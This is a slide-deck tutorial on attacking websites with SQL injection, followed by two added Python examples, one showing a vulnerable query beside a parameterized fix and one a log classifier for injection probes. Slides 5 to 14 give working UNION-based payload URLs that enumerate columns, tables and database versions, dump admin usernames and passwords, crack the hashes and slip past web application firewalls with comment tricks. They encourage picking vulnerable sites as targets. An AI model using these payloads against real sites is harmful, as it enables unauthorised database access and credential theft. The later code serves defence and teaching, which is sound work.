SQL Injection
  1. SQL Injection
     Kaushal Kishore, Sr. Software Engineer, OSSCube Pvt. Ltd.
     Kaushal.rahuljaiswal@gmail.com, www.osscube.com
  2. What is SQL Injection?
     SQL injection is a technique that is applied by giving malicious inputs that allow the attacker to gain access to the database of the host, in case the database operations of that web site are exposed directly.
     "SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks."
  3. How to Hack the Website Using SQL Injection
  4. SQL Injection
  5. Check whether the site is vulnerable or not
     Add a single quote (') after the integer value in the URL:
     http://www.examplesite.com/index.php?id=5
     If the site shows you an error, it is vulnerable to SQL injection. Let's say we found a vulnerable site.
  6. Find the Number of Columns
     http://www.examplesite.com/index.php?id=5 order by 1--
     We keep increasing the number until we get an error.
     http://www.examplesite.com/index.php?id=5 order by 5--
     http://www.examplesite.com/index.php?id=5 order by 10--
     Let's say there are 10 columns in the database.
  7. Find Vulnerable Columns
     http://www.examplesite.com/index.php?id=-5 union select 1,2,3,4,5,6,7,8,9,10--
     Notice that I have put a single - in front of the id number (id=-5). Since there is no page with the id -5, it simply clears the site's text for us. That makes it easier for us to find the data that we are looking for.
     Okay, let's say the numbers 3, 6 and 9 popped up on the site as vulnerable columns.
  8. Find the Database Version
     http://www.examplesite.com/index.php?id=-5 union select 1,2,@@version,4,5,6,7,8,9,10--
     And if that doesn't work, then try this one:
     http://www.examplesite.com/index.php?id=-5 union select 1,2,version(),4,5,6,7,8,9,10--
  9. Find the Database Name
     http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(database()),4,5,6,7,8,9,10--
     Write that name down so you won't forget it. Let's say the database name I just extracted was exampledatabase.
     If the version is 4 or below, it is probably best that you just move on to another site, since you are gonna have to brute force the tables for information (which isn't a very good idea for starters like us).
  10. Find the Table Names
     http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
     http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
     http://www.examplesite.com/index.php?id=-5 union select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
  11. Find the Column Names
     http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name="admin"--
     If the site shows you an error now, don't panic! All that means is that Magic Quotes is turned on. To bypass this we need to convert the text "admin" into hex.
  12. Change the Name of the Table to Hex
     Copy the name of the table you are trying to access, visit the site Text to Hex, and paste the name into the website where it says "Say Hello To My Little Friend". Click Convert and copy the hex into your query like this:
     http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x61646d696e--
     Notice the 0x before the hex string. This tells the server that the next part is a hex string.
     You should now see all the columns inside the table.
  13. Find the Content of the Tables
     Let's say there are 2 columns called username and password. In order to see what is inside those columns we will use this query:
     http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10 from exampledatabase.admin--
     This is where we needed the database name. Btw, the 0x3a means colon ( : ).
     Now you have the admin login!
     If it is encrypted, try to run it through some online md5 decrypters or use my free cracked
     And now we have to find the admin login, to do so, once again you can
  14. Bypass the WAF
     http://www.example.com/staffdetail.php?id=123+/*!union*/select+1,2,3,4,5,6,7--+
     http://www.example.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/1,2,3--
     http://www.example.com/staffdetail.php?id=123+/*!union*//*!select*/+all+1,2,table_name,4,5,6,7+FROM+information_schema.tables+WHERE+table_schema+=+database()+LIMIT+0,10--+
  15. Tools for SQL Injection
     SQL Ninja
     SQL Map
     Havij
  16. Questions
  17. Thank you for your Time and Attention!
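The root cause named in slide 2 and walked through in slides 5 to 13 is the `id` URL parameter being pasted straight into the statement. The following is an added example, not code from the deck or its author: the concatenating lookup beside the strongly typed, parameterized form that defeats the same input. It uses Python's sqlite3 with a constructed in-memory database (`articles` and `admin` tables, a placeholder password value) standing in for the slides' `exampledatabase`.

```python
import sqlite3

# Constructed in-memory stand-in for the slides' "exampledatabase": a public
# "articles" table the page is meant to read, and an "admin" table it is not.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO articles VALUES (5, 'Hello', 'public article text');
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin', 'hash-placeholder');  -- constructed value
    """)
    return conn

def lookup_vulnerable(conn, raw_id):
    # The pattern the slides rely on: the raw URL parameter becomes part of
    # the SQL text, so "-5 union select ..." is parsed as SQL, not as a number.
    sql = "SELECT id, title, body FROM articles WHERE id=" + raw_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, raw_id):
    # Hardened form: strong typing first (slide 2's "not strongly typed"),
    # then a bound parameter, so the value can never be parsed as SQL.
    try:
        id_value = int(raw_id)
    except ValueError:
        return []
    sql = "SELECT id, title, body FROM articles WHERE id=?"
    return conn.execute(sql, (id_value,)).fetchall()

# Constructed input shaped like slide 13's query, adapted to a 3-column page
# (SQLite has no 0x3a string literal, so the colon is written as ':').
PAYLOAD = "-5 union select 1,2,group_concat(username||':'||password) from admin--"

if __name__ == "__main__":
    db = build_db()
    print("normal id, vulnerable :", lookup_vulnerable(db, "5"))
    print("payload,   vulnerable :", lookup_vulnerable(db, PAYLOAD))
    print("payload,   hardened   :", lookup_safe(db, PAYLOAD))
```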
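From the detection side, the probes in slides 5 to 13 and the WAF bypass in slide 14 have recognisable shapes in request logs. This is an added example, not part of the original deck: a classifier that tags a request URL with the probe types it contains, normalising MySQL `/*! ... */` executable comments first so the slide 14 variants are matched the same way the database will read them. The sample request lines are constructed, modelled on the URLs in the slides.

```python
import re
from urllib.parse import unquote_plus

# Signatures drawn from the deck's own probes.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]+\b", re.I),
    "db_fingerprint": re.compile(r"@@version|\bversion\(\)|\bdatabase\(\)", re.I),
}

def normalize(query_string):
    """Decode the query string and expand comments the way MySQL executes them."""
    s = unquote_plus(query_string)          # '+' and %XX become plain characters
    # MySQL runs the body of /*! ... */ "executable comments"; a filter that
    # drops them as ordinary comments is what slide 14's URLs slip past.
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)   # ordinary comments are whitespace
    return re.sub(r"\s+", " ", s).strip()

def classify(url, normalize_first=True):
    """Return the sorted list of signature names that match the URL's query."""
    _, _, qs = url.partition("?")
    text = normalize(qs) if normalize_first else qs
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

# Constructed sample requests, modelled on the deck's URLs.
SAMPLE_REQUESTS = [
    "http://www.examplesite.com/index.php?id=5",
    "http://www.examplesite.com/index.php?id=5 order by 10--",
    "http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10"
    " from information_schema.columns where table_name=0x61646d696e--",
    "http://www.example.com/staffdetail.php?id=123+/*!union*//*!select*/+all+1,2,table_name,4,5,6,7"
    "+FROM+information_schema.tables+WHERE+table_schema+=+database()+LIMIT+0,10--+",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(classify(req, normalize_first=False), "->", classify(req), req[:60])
```

Without normalisation the fourth request loses its `union_select` tag, which is exactly the gap a keyword-only filter leaves.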